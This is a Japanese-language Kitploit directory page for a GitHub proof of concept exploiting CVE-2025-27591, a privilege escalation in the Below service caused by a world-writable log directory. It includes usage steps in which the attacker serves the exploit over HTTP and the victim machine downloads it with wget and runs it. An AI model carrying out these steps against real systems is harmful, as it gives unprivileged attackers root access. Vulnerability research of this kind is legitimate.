Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/bridgeralderson/cve-2025-27591-poc
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育
GitHubbridgeralderson/cve-2025-27591-poc

CVE-2025-27591-PoC

CVE-2025-27591 は、バージョン 0.9.0 より前の Below サービスに影響を与えた特権昇格の脆弱性です。

リポジトリを見る
32211年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-27591 概念実証

CVE-2025-27591 は、バージョン0.9.0より前のBelowサービスに影響を与えた特権昇格の脆弱性です。問題は、/var/log/below にワールド書き込み可能なディレクトリが作成されたことに起因します。攻撃者はこのディレクトリ内でシンボリックリンクを操作し、root権限を取得する可能性があり、ローカルの非特権ユーザーにとって深刻なセキュリティ上の懸念事項となっています。

この概念実証は、教育および研究目的のみで作成されました。

執筆時点では、この脆弱性に対する公開されたPoCはコミュニティに存在していませんでした。そのため、私はこの実装を責任を持って共有し、そのギャップを埋め、セキュリティ研究エコシステムに貢献し、安全でないファイルシステムの重大性について認識を高めることにしました。

脆弱性の原因

画像

概念実証

攻撃者マシンから:

1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git

2-cd CVE-2025-27591-PoC

3-python3 -m http.server 80

脆弱なシステムから:

1- wget http:///exploit.py

2-python exploit.py

画像

参考文献

https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3

ツールをダウンロード